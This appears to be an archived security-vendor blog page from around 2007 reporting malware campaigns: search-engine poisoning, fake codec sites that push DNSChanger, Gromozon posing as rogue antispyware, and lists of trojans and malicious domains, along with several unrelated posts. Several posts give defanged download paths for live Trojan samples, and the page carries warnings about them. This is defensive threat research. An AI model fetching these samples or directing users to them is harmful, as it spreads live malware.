Category: Uncategorized

As a follow-up to our recent posts, here’s some additional information.

First, we can ring the all-clear bell. Google took action on these domains and you won’t find them anymore in Google.

However, check out this javascript:

(source: cxsjrkelgvjs(dot)cn/gopnikovnet(dot)js << malware site)

So. if you use search terms like “inurl” and “site”, you won’t see these malware pages in your results. Clever, since that’s one way for malware researchers to find stuff (I recently wrote an article on this subject for VirusBulletin). And, it only cares if you’re coming from Google.

Quite interesting.

Alex Eckelberry
(Thanks to Sunbelt researchers Adam Thomas and Francesco Benedini)

Here’s a first — the Italian Gromozon, one of the nastiest pieces of malware in creation, being pushed in disguised form as a rogue antispyware security app.

(This same page also installs Malwarealarm, but through a different file.)

Incidentally, it’s also the first time we’ve seen Gromozon not being delivered through exploit but through social engineering.

VirusTotal results here.

Alex Eckelberry
(Credit to Sunbelt researcher Francesco Benedini)

Hi all, Adam Thomas here from the Malware Research Team. I just wanted to post a follow up to our blog post yesterday regarding malware redirects from search engine results.

Sunbelt Software has uncovered tens of thousands of individual pages that have been meticulously created with the goal of obtaining high search engine ranking. Just about any search term you can think of can be found in these pages.

For example, the image below shows one page that focuses heavily on searches including the word “infinity”.

This example shows hundreds of search terms for “hospice”. Pretty sick.

For months now, our Research Team has monitored a network of bots whose sole purpose is to post spam links and relevant keywords into online forms (typically comment forms and bulletin board forums). This network, combined with thousands of pages such as the two seen above, have given the attackers very good (if not top) search engine position for various search terms.

In our previous post, we mentioned that the malicious pages also contained an IFRAME link which would attempt to exploit vulnerable systems. If you were unlucky enough to run across one of these links while surfing with a vulnerable system, you would become infected with a family of malware that we call Scam.Iwin. With Scam.Iwin, the victim’s computer is used to generate income for the attacker in a pay-per-click affiliate program by transmitting false clicks to the attacker’s URLs without the user’s knowledge. The infected Scam.Iwin files are not ordinarily visible to the user. The files are executed and run silently in the background when the user starts the computer and/or connects to the internet.

Scam.Iwin is also used to load malware for other groups. In this case, one of those malware groups is known to have been associated with the infamous RBN (Russia Business Network).

Links loaded by Scam.Iwin:

So far we have observed the following malware being installed:

Trojan.Crypt.XPACK.Gen
Trojan-Downloader.Small.AAGX
Trojan-Downloader.Win32.Agent.ev
Trojan-Downloader.Win32.Agent.bnm
Trojan-Downloader.Win32.Agent.eus
Trojan-Downloader.Gen
Trojan-Downloader.Win32.Obfuscated.n
Trojan-Downloader.Win32.Small.ddx
Trojan-Downloader.Win32.Small.cib
Trojan-Proxy.Win32.Xorpix.Fam
Trojan.DNSChanger.Gen
Trojan.Win32.Patched.q
Trojan.Rawlam.C
Trojan.FakeAlert
Trojan.SpamThru (Spam-Bot)
Trojan.Netview (Information Stealer)
Trojan-Downloader.Win32.BHO.bt
Trojan.Win32.Pakes.bqt
Scam.Iwin
Dialer.Win32.GBDialer.i (v)
Backdoor.Rustock (spam-bot)
Trojan.Srizbi
Trojan-PWS.Win32.Bzub.gen (Information stealer)
Backdoor.Win32.Small.lu (Information Stealer)
Awola (Rogue Security Program)
Ultimate SecuritySuite (Rogue Security Program)

If your system was not vulnerable (i.e. your system is fully up-to-date with the latest patches), and you were duped into installing the “ActiveX Upgrade”, then you might simply be left with a toolbar installed into Internet Explorer as well as some pesky pop-up advertising for Rogue Security Software.

Of course, the team over at Google has been notified of this. Other search engine companies are welcome to contact us for more information.

Oh, what a tangled web we do weave . . .

Adam

We’re seeing a large amount of seeded search results which lead to malware sites.

These are using common, innocent terms — one researcher landed on a malware site through searching for alternate firmware for a router.

For example, this search for “netgear ProSafe DD-WRT” yields these results:

That site, luewusxrijke(dot)cn/769(dot)html, redirects to another site which pushes a fake codec (malware) and attempts to exploit vulnerable system:

This IFRAME leads to additional malware installs:

These malware distributors are using keywords to lure people into their sites (some example search terms here — PDF).

Some more examples, on innocent search terms.

Clicking on these links will expose the user to exploits which will infect a vulnerable system (in other words, a system that is not fully up-to-date with the latest patches).

Alex Eckelberry
(Thanks Adam Thomas)

A new fake codec: codecvip(dot)com.

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: codecvip(dot)com/download/codecvip(dot)dmg; Windows: codecvip(dot)com/download/codecvip(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Bharath)

Paul Andreason made a comment about Adult Friend Finder (AFF) that has been misconstrued by a large number of folks, resulting in some hate mail. This was exacerbated by a subsequent blog post I made about AFF, where I pointed out comment spam (not his). In the screen shot (since changed), Paul’s comment was next to the comment spammers — possibly leading people to believe he was on the side of AFF.

Paul does not support AFF in the any way. As he puts it, “I was trying to point out that money was the reason they did that, and that morals and money don’t coexist in today’s world.”

Hopefully that sorts things out and he stops getting hate mail 😉

Alex Eckelberry

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: ultrahqcodec(dot)com/download/playcodec1123(dot)dmg; Windows: ultrahqcodec(dot)com/download/playcodec1123(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Adam Thomas)

My recent blog post on Adult Friend Finder, critical of the company’s spamming methods, attracted some attention: Of a comment spammer.

Apparently from an affiliate, the Adult Friend Finder link points to medimenia.com and the hompage link points to ourfriendfinder.com. I’ve edited the links so that they are no longer live — why help these slimeballs?

Alex Eckelberry

Sandy, in our sales department, is pursuing his dream of becoming a helicopter pilot.

Unfortunately for us, he has taken to buzzing the Sunbelt building during his training sessions. Waving happily as he goes by, we all sit mute in terror as this neophyte pilot flies by.

Dan, our webmaster, took a shot of Sandy doing a fly-by.

Pray for us.

Alex Eckelberry

Other sites on the same IP one might consider avoiding are:

Cigs4you.info 
D101b.com 
Estrel-logistics.com 
Fethard-best.com 
Fresh-film.net 
Gp-eurocapital.com 
Hack-off.info 
Ihos.info 
Intway587.com 
Lskdfjlerjvm.com 
Media-content.biz 
Online-traffeng.com 
Pin-l-games.com 
Piterseo.com 
Prestra.com 
Prestra.net 
Qadro.net 
Qwert285.com 
Referatoff.info 
Serbitoname.info 
Serd158.com 
Trafagon.net 
Unistream-shipping.com 
Usps-mailcorp.com 
Vermont-trust.com 
Xolodilnikov.net 

Patrick Jordan

I’m a member of a number of lists, and always get blasted with Out of Office replies when I post.
There’s a handy-dandy switch introduced in E2k3 that gets rid of this annoyance.

In Exchange 2003, it is now possible to modify the Out Of Office behaviour to help in these situations. A new registry key exists that prevents the sending of Out Of Office responses unless the recipient is explicitly listed in either the TO: or CC: fields of the message. Since mailing list posts aren’t addressed explicitly to list members, the suppression of Out Of Office responses to mailing list members is achieved.

To enable this feature, add the DWORD parameter SuppressOOFsToDistributionLists with a value of 1 into the following registry location:

HKLMSystemCurrentControlSetServicesMSExchangeISParametersSystem

More here.

Alex Eckelberry

Sunbelt’s coming to the Big Apple.

You’re invited to free seminar on Email Archiving, hosted at the Microsoft office in Manhattan on Thurs, Dec. 6, from 9 – 12.

Join Mike Osterman, president and founder of Osterman Research, Inc., a leading analyst firm on messaging, for an engaging discussion on “Implementing an Effective Email Archiving Strategy for Exchange.”

Mike will be discussing how an effective email archiving strategy can help you deal with the issues resulting from growth in email storage, new e-discovery, and privacy requirements and explain the need for organizations to automatically archive content and make it readily accessible to anyone in the enterprise that needs it – all while reducing the cost of managing messaging-related storage.

Agenda:

Learn how to get a handle on growing email archiving and storage issues

Understand the importance of compliance, eDiscovery and legal readiness

Discover the cost-savings benefits to proper archiving, including faster backup/restore time, knowledge management and disaster recovery

See a live demo of Sunbelt Exchange Archiver in action: 80% message store reduction, end-user lost email self-service, improved performance and much, much more

When: Thurs., Dec. 6
Time: 9:00 a.m. – 12:00 p.m. (Continental Breakfast Included)
Cost: None
Location: Microsoft
1290 Avenue of the Americas, 6th Floor
New York, NY 10104

Click here to register.

Alex Eckelberry

I have been a huge believer in the power of ebooks for a long time. Now, Amazon has released the Kindle.

The technology is very cool, and it looks like it’s been well-implemented.

However, it’s got to be the ugliest piece of hardware I’ve ever seen.

If you’re interested, it’s worth reading the customer reviews. And watching the video.

I’d push my wife to get it for me as a Christmas gift (even if it didn’t have a huge amount of content, the gadget pull might be strong enough), but its so ugly that the “tech-lust” factor is kind of ruined.

Just compare the look of the ungainly Kindle to the sleek Sony Reader:

Curious to know your thoughts.

Alex Eckelberry

Heads up on this new fake codec, dltsolution(dot)com.

Incidentally, here’s what your system looks like after installing this thing:

As an aside, VirusProtect is removable from Add/Remove:

But good luck, it won’t get rid of everything:

Anyway, in the case of this site, a sample binary can be found at dltsolution(dot)com/download.php?id=4082. And please — don’t touch this Trojan unless you know what you’re doing.

Alex Eckelberry
(Credit to Patrick Jordan)

Alex Eckelberry
(Thanks Patrick)

Pretty nice product, if I might say so myself.

CLEARWATER, FL–(Marketwire – November 19, 2007) – Sunbelt Software, a leading provider of Windows security and management software, today announced the release of Sunbelt Exchange Archiver, its new email archiving solution for Microsoft Exchange environments. Sunbelt Exchange Archiver (SEA) delivers cost-effective enterprise-class email archiving for organizations of all sizes, providing administrators with intelligent features such as integrated Hierarchical Storage Management (HSM), Direct Archiving for instant archival of incoming mail, full email continuity and disaster recovery, and seamless integration with Microsoft Exchange, Outlook and Outlook Web Access (OWA).

SEA combines efficiency and innovation to give organizations a powerful email lifecycle management system that offers tamper-proof, long-term storage of emails with easy retrieval capabilities and full-text searching. SEA enables companies to preserve all electronic messages on a broad range of storage media, offloading the strain on Exchange servers.

More company propoganda here.

Alex Eckelberry

We’ve written before about Direct Revenue’s demise.

However, it’s still to early to say that this bugger is dead. We’re still seeing Direct Revenue binaries and sites out there.

They have 64 known sites that are still assigned IP addresses and DNS servers, which make them active even if they cannot be accessed any longer, and 25 are active and also still registered to them under their thinkingmedia.net business name. The majority of the sites do not expire until the January through August 2008 timeframe.

Since the end of 2005, when Direct Revenue claimed they were cleaning up their act, they went through all their servers where they stored their adware files and selectively removed only the main adware BHO dlls, leaving all their components still as live downloads.

Until they let every one of their sites expire, delete all their files on the servers, and cancel their services for their sub domains, it’s too soon to say that this group has ceased operations.

Our latest site list is here (pdf). We also have a list of active binaries we are tracking, here (pdf).

Alex Eckelberry
(Thanks to Patrick Jordan)

I rather think the name of this site is fitting:

Pushes both Windows and Mac TrojanDNSChanger.

Sample binaries: Mac: bsplaycodec(dot)com/download/playcodec1123(dot)dmg; Windows: bsplaycodec(dot)com/download/playcodec1123(dot)exe. If you are hunting for Mac fake codecs, remember to change your user agent to a Mac. And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Alex Eckelberry
(Thanks Patrick Jordan)

I loath this site. Putting aside the dubious moral issues, it’s routinely pushed in social networking spam (such as Myspace), and it’s been advertised heavily in malware. Maybe it’s pushed by affiliates and not the company, but we’ve all heard that argument before. It’s still the company’s responsibility.

Now it looks like the site may have been acquired — and one of the rumored buyers is Penthouse Magazine. The size of the deal might be as high as $500 million.

Taking a look at a Wikipedia entry for the site is disturbing:

A key feature of their online advertising system is pictures of attractive women supposedly living local to the website user. This is achieved by IP-localisation software. On the AFF website (as with many ther similar sites), some advertisers (usually female) use faked details to entice others, including fake photographs. Some of the photographs known to have been used include those of well-known porn stars and similar…A velocitypress.com study showed that the male-female ratio is 10 to 1, that 2/3rds of the claimed subscribers have not visited the site for over 3 months and that nearly half of the women were angling for lesbian relationships.

What a circus.

I hope the acquiring company knows what it’s getting into.

Alex Eckelberry

Pushes both Windows and Mac TrojanDNSChanger. 

Sample binaries: Mac: playcodec(dot)net/download/playcodec4327(dot)dmg; Windows: playcodec(dot)net/download/playcodec(dot)exe.  If you are hunting for Mac fake codecs, remember to change your user agent to a Mac.  And please — don’t touch these binaries unless you know what you’re doing, as they are live Trojans.

Incidentally, one site doing a good job of keeping up with fake codecs is http://peki.blogspot.com/.

Alex Eckelberry
(Thanks Bharath)